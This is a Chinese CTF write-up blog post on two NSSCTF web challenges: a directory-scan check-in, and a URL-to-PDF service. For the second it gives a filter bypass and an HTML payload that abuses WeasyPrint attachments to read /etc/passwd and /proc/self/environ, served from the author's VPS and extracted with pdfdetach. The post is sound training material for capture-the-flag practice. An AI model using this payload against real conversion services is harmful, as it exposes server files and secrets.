NSSCTF-Round#20-Basic-WEB

本文最后更新于:5 个月前

真亦假,假亦真

签到

扫目录,访问 /flag 即可

CSDN_To_PDF V1.2

url 转 pdf

尝试之后,发现 url 必须包含 blog.csdn.nethttps://http://,同时过滤了 html

遂构造 http://host:port/hack?blog.csdn.net

vps 上监听端口,访问得

image-20240330175430314

可以看到是 WeasyPrint ,存在 文件包含 漏洞

本地建个 hack 文件

1
2
3
4
5
6
7
8
9
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
<link rel="attachment" href="file:///etc/passwd">
</body>
</html>

放在 vps 上,启动即可

1
python3 -m http.server 9999

输入http://host:port/hack?blog.csdn.net ,得到文件

使用 pdfdetach 分析即可得到

1
2
pdfdetach -list xx.pdf
pefdetach -save 1 xx.pdf

image-20240330180443524image-20240330180527711

得到image-20240330180657222

flag 藏在 /proc/self/environ

image-20240330180901336


NSSCTF-Round#20-Basic-WEB
http://example.com/posts/a932742f/
作者
Fanllspd
发布于
2024年3月30日
更新于
2024年3月30日
许可协议